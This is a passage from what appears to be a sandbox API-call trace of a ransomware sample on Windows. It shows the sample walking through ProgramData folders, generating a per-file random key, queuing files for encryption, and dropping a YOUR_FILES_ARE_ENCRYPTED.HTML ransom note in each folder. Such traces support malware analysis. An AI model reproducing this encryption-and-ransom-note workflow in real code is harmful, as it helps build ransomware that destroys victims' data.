lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7c5a92b0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xd2cc8ee0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xd2cc8ee0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0156.946] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7c5a92b0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xd2cc8ee0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xd2cc8ee0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.946] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7d2c0bb0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x9337e7d0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x9337e7d0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Cache", cAlternateFileName="")) returned 1 [0156.946] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache") returned 67 [0156.946] GetProcessHeap () returned 0x270000 [0156.946] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0156.946] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache" [0156.946] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*" [0156.946] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7d2c0bb0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x9337e7d0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x9337e7d0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0156.947] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7d2c0bb0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x9337e7d0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x9337e7d0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.947] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9337e7d0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x9337e7d0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x7cbc2cf0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x13d68, dwReserved0=0x0, dwReserved1=0x60, cFileName="cache.dat", cAlternateFileName="")) returned 1 [0156.947] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat") returned 77 [0156.947] lstrcmpW (lpString1="cache.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.947] PathFindExtensionW (pszPath="cache.dat") returned=".dat" [0156.947] lstrlenW (lpString=".dat") returned 4 [0156.947] PathFindExtensionW (pszPath="cache.dat") returned=".dat" [0156.947] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.947] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0156.947] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=81256) returned 1 [0156.947] GetProcessHeap () returned 0x270000 [0156.948] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73f0050 [0156.951] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="3A") returned 2 [0156.951] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="13") returned 2 [0156.951] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="EA") returned 2 [0156.951] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="BE") returned 2 [0156.951] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="8E") returned 2 [0156.951] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="D7") returned 2 [0156.951] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="67") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="82") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="B5") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="65") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="00") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="6B") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="F4") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="AA") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="59") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="00") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="68") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="4E") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="FB") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="44") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="BB") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="0B") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="58") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="40") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="52") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="99") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="44") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="99") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="7F") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="6C") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="B6") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="14") returned 2 [0156.953] lstrcpyW (in: lpString1=0x7400104, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" [0156.953] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x73f0050, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.953] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73f0050, lpOverlapped=0x73f0050) returned 1 [0156.953] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9337e7d0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x9337e7d0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x7cbc2cf0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x13d68, dwReserved0=0x0, dwReserved1=0x60, cFileName="cache.dat", cAlternateFileName="")) returned 0 [0156.953] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0156.953] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 97 [0156.953] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\cache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0156.954] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0156.956] CloseHandle (hObject=0x4a8) returned 1 [0156.956] GetProcessHeap () returned 0x270000 [0156.957] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0156.957] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8151b0f0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xd2cc8ee0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xe234d540, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x2ae74a, dwReserved0=0x0, dwReserved1=0x60, cFileName="tokens.dat", cAlternateFileName="")) returned 1 [0156.957] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat") returned 72 [0156.957] lstrcmpW (lpString1="tokens.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.957] PathFindExtensionW (pszPath="tokens.dat") returned=".dat" [0156.957] lstrlenW (lpString=".dat") returned 4 [0156.957] PathFindExtensionW (pszPath="tokens.dat") returned=".dat" [0156.957] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0156.958] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\tokens.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x4a8 [0156.958] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=2811722) returned 1 [0156.958] GetProcessHeap () returned 0x270000 [0156.958] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0156.962] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="C1") returned 2 [0156.962] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="21") returned 2 [0156.962] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="F1") returned 2 [0156.962] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="26") returned 2 [0156.962] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="0E") returned 2 [0156.962] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="B0") returned 2 [0156.962] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="98") returned 2 [0156.962] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="5A") returned 2 [0156.962] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="FD") returned 2 [0156.962] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="09") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="4E") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="1B") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="51") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="2A") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="95") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="79") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="D1") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="09") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="C8") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="CD") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="69") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="78") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="2C") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="52") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="12") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="B1") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="0A") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="A3") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="C7") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="C5") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="0D") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="4B") returned 2 [0156.964] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" [0156.964] CreateIoCompletionPort (FileHandle=0x4a8, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.964] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0156.964] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8151b0f0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xd2cc8ee0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xe234d540, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x2ae74a, dwReserved0=0x0, dwReserved1=0x60, cFileName="tokens.dat", cAlternateFileName="")) returned 0 [0156.964] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0156.964] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 91 [0156.964] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0156.965] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0156.967] CloseHandle (hObject=0x598) returned 1 [0156.968] GetProcessHeap () returned 0x270000 [0156.969] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0156.969] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f55fb4, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9f55fb4, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="RAC", cAlternateFileName="")) returned 1 [0156.969] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC") returned 32 [0156.969] GetProcessHeap () returned 0x270000 [0156.969] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74ea160 [0156.970] lstrcpyW (in: lpString1=0x74ea160, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\RAC" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC" [0156.970] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\*" [0156.970] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f55fb4, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9f55fb4, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0156.970] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f55fb4, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9f55fb4, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.970] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f2fe55, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x89995398, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Outbound", cAlternateFileName="")) returned 1 [0156.970] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound") returned 41 [0156.970] GetProcessHeap () returned 0x270000 [0156.970] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0156.971] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound" [0156.971] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound\\*" [0156.971] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f2fe55, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x89995398, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0156.972] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f2fe55, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x89995398, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.972] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f2fe55, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x89995398, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0156.972] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0156.972] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 71 [0156.972] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\rac\\outbound\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0156.973] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0156.975] CloseHandle (hObject=0x5a0) returned 1 [0156.976] GetProcessHeap () returned 0x270000 [0156.976] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0156.976] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x9ada4280, ftLastAccessTime.dwHighDateTime=0x1d7e775, ftLastWriteTime.dwLowDateTime=0x9ada4280, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="PublishedData", cAlternateFileName="PUBLIS~1")) returned 1 [0156.976] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData") returned 46 [0156.976] GetProcessHeap () returned 0x270000 [0156.977] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0156.977] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData" [0156.977] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\*" [0156.977] FindFirstFileW (in: 